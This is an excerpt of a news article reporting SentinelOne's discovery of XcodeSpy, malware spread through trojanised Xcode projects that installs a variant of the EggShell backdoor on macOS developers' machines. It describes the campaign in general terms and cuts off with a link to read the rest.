According to researchers, XcodeSpy malware is targeting Xcode Developers in a supply-check attack.
The commonly known secure MacOS has been infiltrated by malware again that has been used by unknown threat actors to target developers who use Xcode integrated development environment (IDE).
Threat actors have recently started making malicious versions of popular projects in the hopes of luring developers to include them in their applications. When these applications are compiled, the malicious component will infect their computer in a supply-chain attack.
The malware, named XcodeSpy, was disguised to deliver a custom variant of a backdoor known as EggShell which allows its operators to spy on users and it was discovered by the IT security researchers at SentinelOne on Thursday.
This backdoor can also give the threat actors access to upload and download files, capture data from the victim’s camera, microphone, and keyboard.
SentinelOne’s report states that they got to know about the malware from an anonymous researcher but the company did also come across XcodeSpy back in late 2020 targeting an organization in the US.
SentinelOne was informed by the victim that it is being regularly targeted by threat actors linked to North Korea and they came across it while conducting threat hunting activities.
There has been cross-referenced evidence found that states how the campaign involving XcodeSpy was active at least between July and October 2020. The malware was als ..
Support the originator by clicking the read the rest link below.
